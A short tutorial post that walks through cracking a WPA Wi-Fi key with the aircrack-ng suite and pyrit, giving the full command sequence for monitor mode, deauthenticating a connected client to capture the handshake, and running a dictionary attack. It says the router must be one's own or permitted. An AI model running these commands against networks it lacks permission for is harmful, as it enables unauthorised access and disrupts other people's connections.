This is the follow on post to the pyrit set-up.
Once its been set-up you are able to test the strength of your WPA encrypted router.
There are a few important points to note when cracking WPA.
Firstly it has to be your own router or you must have permission from the administrator.
Secondly the key that your cracking has to be inside the list or dictionary file.
If the password isn't in the dictionary file, the key will not be cracked.
Note that 'insecurepass' is different to 'Insecsurepass'.
Finally their access point has to have a client connected because during the process of capturing a handshake, the client is de-authenticated allowing the handshake to be recaptured.
The method behind WPA cracking is different to that of WEP. WEP is cracked by repetition of the IV packets. WPA is cracked by firstly capturing the handshake, where the client connects to the AP, then brute forced using a dictionary or word list.
The commands:
airmon-ng airmon-ng start wlan0 airodump-ng mon0 airodump-ng -c 11 -w output --bssid mon0 aireplay --deauth 0 -a bssid -c client mon0 Ctrl + C to cancel the deauth and capture pyrit eval pyrit -i pass.lst import_passwords pyrit -e j2neonAP create_essid pyrit eval pyrit batch pyrit verify pyrit -o wpadb export_hashdb aircrack -r wpadb output01.capCommands will differ for each WPA crack and access point. Firstly the -c is the channel of the AP, mines on 11. -w is simply the name of the text file and each bssid is different.
In the pyrit section pass.lst is a simple list that I created for the purpose of this vid and contains a few keys. This should be replaced with a decent word list or password list.
j2neonAP is my essid and again this is different for each, this is also used as a salt during the batch process.
Videos:
Blip.tv link:
Cracking WPA using pyrit and aircrack Blip.tv
YouTube link:
Cracking WPA using pyrit and aircrack YouTube
Sorry again, for the square mouse camtasia, VB and BT5 don't play together nicely.
Thanks
2neon